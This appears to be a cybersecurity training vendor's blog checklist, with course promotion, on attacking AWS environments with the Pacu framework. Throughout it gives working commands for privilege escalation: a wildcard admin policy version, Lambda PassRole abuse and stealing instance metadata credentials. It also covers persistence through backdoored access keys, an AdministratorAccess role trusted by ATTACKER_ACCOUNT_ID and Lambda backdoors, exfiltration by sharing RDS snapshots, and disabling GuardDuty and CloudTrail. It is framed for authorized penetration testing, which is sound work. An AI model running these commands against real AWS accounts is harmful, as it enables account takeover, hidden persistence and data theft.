AWS environments are high-value targets. Misconfigured IAM roles, over-permissioned Lambda functions, exposed S3 buckets, and poorly scoped service accounts create attack surfaces that adversaries actively exploit. Pacu, the open-source AWS exploitation framework developed by Rhino Security Labs, gives penetration testers and red teamers a structured, modular approach to enumerating and exploiting these weaknesses.
This checklist walks through the complete Pacu workflow for AWS security testing, from initial setup and credential configuration through privilege escalation, persistence, and lateral movement. Every section includes real commands you can run in your engagements.
If you are serious about building hands-on cloud offensive skills, the AWS Pentesting Course at Redfox Cybersecurity Academy covers these exact techniques in a structured lab environment.
Pacu requires Python 3 and works best in a dedicated virtual environment. Start clean to avoid dependency conflicts.
git clone https://github.com/RhinoSecurityLabs/pacu.git
cd pacu
python3 -m venv venv
source venv/bin/activate
pip3 install -r requirements.txt
python3 main.py
[cta]
Once Pacu launches, you will be dropped into an interactive shell. Create a new session to isolate your engagement data.
Pacu (us-east-1) > new_session redfox_aws_test
[cta]
Pacu reads credentials directly from AWS profiles, environment variables, or manual input. For engagements where you have been provided access keys, use the set_keys command.
Pacu (redfox_aws_test) > set_keys
Key Alias: initial_access
Access Key ID: AKIA...
Secret Access Key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Session Token (optional): leave blank if not using STS
[cta]
To import credentials from an existing AWS CLI profile:
Pacu (redfox_aws_test) > import_keys profile_name
[cta]
Verify the active keys and check what identity you are operating as before running any modules:
Pacu (redfox_aws_test) > whoami
[cta]
Reconnaissance in AWS is not passive in the traditional sense. Every API call is logged in CloudTrail, so disciplined testers scope their enumeration carefully and document what they run.
Start by establishing the full identity context of your compromised credentials. This includes the account ID, ARN, and any attached policies.
Pacu (redfox_aws_test) > run iam__detect_honeytokens
Pacu (redfox_aws_test) > run iam__enum_users_roles_policies_groups
[cta]
The iam__enum_users_roles_policies_groups module pulls all IAM users, roles, policies, and groups visible to the current principal. Pay attention to inline policies and directly attached managed policies, as these often contain over-permissioned actions that were added outside of a formal change management process.
For a targeted check on what the current user can actually do:
Pacu (redfox_aws_test) > run iam__bruteforce_permissions
[cta]
This module attempts to call a broad set of AWS API actions and records which ones succeed, giving you a practical permissions map without needing to parse complex policy documents.
S3 misconfigurations remain one of the most common findings in AWS assessments. Use Pacu to enumerate accessible buckets and check for public access or permissive ACLs.
Pacu (redfox_aws_test) > run s3__enum_bucket_unauthenticated
Pacu (redfox_aws_test) > run s3__get_bucket_acls
[cta]
Follow up by searching bucket contents for sensitive data patterns:
Pacu (redfox_aws_test) > run s3__download_bucket --bucket-name target-bucket-name
[cta]
If you are working through the Redfox Cybersecurity Academy AWS Pentesting Course, you will practice these exact S3 enumeration patterns against intentionally misconfigured lab environments built to mirror real-world targets.
Pacu (redfox_aws_test) > run ec2__enum_instances
Pacu (redfox_aws_test) > run ec2__enum_security_groups
Pacu (redfox_aws_test) > run ec2__enum_elastic_ips
[cta]
The EC2 enumeration modules pull instance metadata including AMI IDs, instance profiles, security group rules, and public IP associations. Look for instances using overly permissive security groups, particularly those allowing 0.0.0.0/0 ingress on SSH, RDP, or management ports.
Pacu (redfox_aws_test) > run lambda__enum
[cta]
Lambda functions frequently contain hardcoded credentials, API keys, or internal service endpoints in their environment variables. The lambda__enum module pulls function configurations including those environment variables, which are a high-priority review item in every AWS assessment.
IAM privilege escalation is the core skill in AWS offensive security. Pacu automates the detection and exploitation of the most common escalation paths described by Rhino Security Labs.
Pacu (redfox_aws_test) > run iam__privesc_scan
[cta]
This module checks the current principal's permissions against a comprehensive list of known escalation techniques. It will flag paths such as:
iam:CreatePolicyVersion on a privileged policyiam:AttachUserPolicy to attach AdministratorAccess to yourselfiam:PassRole combined with ec2:RunInstanceslambda:CreateFunction combined with lambda:InvokeFunction and iam:PassRolests:AssumeRole on roles with overly permissive trust policiesWhen the scanner identifies a viable path, it reports the specific permissions involved and the technique required to exploit them.
If the current principal has iam:CreatePolicyVersion on a policy attached to a privileged role:
aws iam create-policy-version \
--policy-arn arn:aws:iam::123456789012:policy/TargetPolicy \
--policy-document '{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}' \
--set-as-default
[cta]
This is one of the most frequently seen escalation paths in real engagements. If you have iam:PassRole, lambda:CreateFunction, and lambda:InvokeFunction:
aws lambda create-function \
--function-name privesc-test \
--runtime python3.11 \
--role arn:aws:iam::123456789012:role/AdminRole \
--handler index.handler \
--zip-file fileb://function.zip
aws lambda invoke \
--function-name privesc-test \
--payload '{}' \
output.json
[cta]
The function code itself can call sts:AssumeRole or iam:CreateAccessKey to extract credentials from the higher-privileged role.
For paths that Pacu can exploit directly:
Pacu (redfox_aws_test) > run iam__privesc_scan --scan-only
Pacu (redfox_aws_test) > run iam__privesc_scan --technique TECHReplace TECHNIQUE_NAME with the specific method identified by the scan, such as CreatePolicyVersion, AttachUserPolicy, or UpdateLoginProfile.
Once you have elevated access, the next objective is harvesting credentials from other services and moving laterally across the environment.
EC2 instance metadata (IMDS) is a critical source of temporary credentials in any AWS environment. From inside an EC2 instance:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
[cta]
If IMDSv1 is enabled (which it still is in many environments), these calls require no authentication token. IMDSv2 requires a session token but is still exploitable from within the instance:
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
[cta]
Pacu can enumerate and pull values from AWS Secrets Manager and Systems Manager Parameter Store, both of which are commonly used to store database credentials, API keys, and third-party service tokens.
Pacu (redfox_aws_test) > run secretsmanager__enum
Pacu (redfox_aws_test) > run ssm__param_enum
[cta]
Secrets discovered here can enable lateral movement into databases, external SaaS platforms, or other AWS accounts referenced in the secrets values.
If you discover cross-account trust relationships during enumeration:
aws sts assume-role \
--role-arn arn:aws:iam::987654321098:role/CrossAccountRole \
--role-session-name redfox-test-session
[cta]
Feed the returned AccessKeyId, SecretAccessKey, and SessionToken into Pacu as a new key set:
Pacu (redfox_aws_test) > set_keys
Key Alias: cross_account
Access Key ID: ASIA...
Secret Access Key: xxxxxxxxxxxxxxxx
Session Token: AQoXb3...
[cta]
Establishing persistence in AWS does not mean installing a rootkit. It means creating access mechanisms that survive credential rotation or the removal of the initial compromised access.
Pacu (redfox_aws_test) > run iam__backdoor_users_keys
[cta]
This module creates new access keys for existing IAM users, giving the tester a second set of credentials that may go unnoticed if the defender only resets the originally compromised keys.
aws iam create-role \
--role-name BackdoorRole \
--assume-role-policy-document '{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::ATTACKER_ACCOUNT_ID:root"
},
"Action": "sts:AssumeRole"
}
]
}'
aws iam attach-role-policy \
--role-name BackdoorRole \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
[cta]
Deploying a Lambda function that periodically creates new access keys or reports credentials to an external endpoint is a common adversary technique.
Pacu (redfox_aws_test) > run lambda__backdoor_new_roles
[cta]
This Pacu module automates the deployment of a Lambda function that attaches to new role creation events and backdoors them automatically as they are created.
Data exfiltration objectives in AWS assessments typically center on S3, RDS snapshots, and EBS snapshots. Documenting what is reachable is often enough; you rarely need to transfer real data in a responsible engagement.
aws s3 ls s3://target-bucket --recursive
aws s3 cp s3://target-bucket/sensitive-file.txt ./
[cta]
For reporting purposes, document the bucket name, object key, size, and last modified date rather than downloading production data where possible.
If the compromised principal has rds:ModifyDBSnapshotAttribute, they can share an existing snapshot with an external account:
aws rds modify-db-snapshot-attribute \
--db-snapshot-identifier prod-db-snapshot \
--attribute-name restore \
--values-to-add ATTACKER_ACCOUNT_ID
[cta]
This technique allows exfiltration of full database contents without touching the live database instance, making it harder to detect through standard database logging.
Understanding detection evasion is essential for red team engagements that measure both offensive capability and blue team detection coverage.
Pacu (redfox_aws_test) > run cloudtrail__download_event_history
Pacu (redfox_aws_test) > run detection__disruption
[cta]
The detection__disruption module includes techniques for disabling GuardDuty, stopping CloudTrail logging, and modifying CloudWatch alarms. In a responsible engagement, document the capability without executing destructive actions in production environments unless explicitly scoped.
Pacu allows you to run modules with --dry-run where supported, and you can review the specific API calls each module makes before executing:
Pacu (redfox_aws_test) > run module_name --dry-run
Pacu (redfox_aws_test) > help module_name
[cta]
Spacing out API calls, avoiding wildcard resource enumeration, and operating from IP addresses consistent with legitimate usage are standard operational security practices for covert engagements.
The table below summarizes the key Pacu modules covered in this checklist by phase.
AWS penetration testing with Pacu is a disciplined, structured process. The framework gives you modular coverage across the full attack lifecycle, from initial enumeration and IAM privilege escalation through persistence and data exfiltration simulation. Every module maps to a real-world technique that adversaries use against production AWS environments.
The most impactful findings in AWS assessments come from IAM misconfigurations. Understanding the privilege escalation paths Pacu detects, and being able to explain them clearly in a report, separates a competent AWS tester from a strong one.
If you want to build this skill set in a structured lab environment where you can run these exact modules safely against intentionally vulnerable AWS infrastructure, the AWS Pentesting Course at Redfox Cybersecurity Academy is designed precisely for that. The course covers IAM privilege escalation, cross-account attacks, Lambda exploitation, and full red team workflows against realistic AWS environments.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
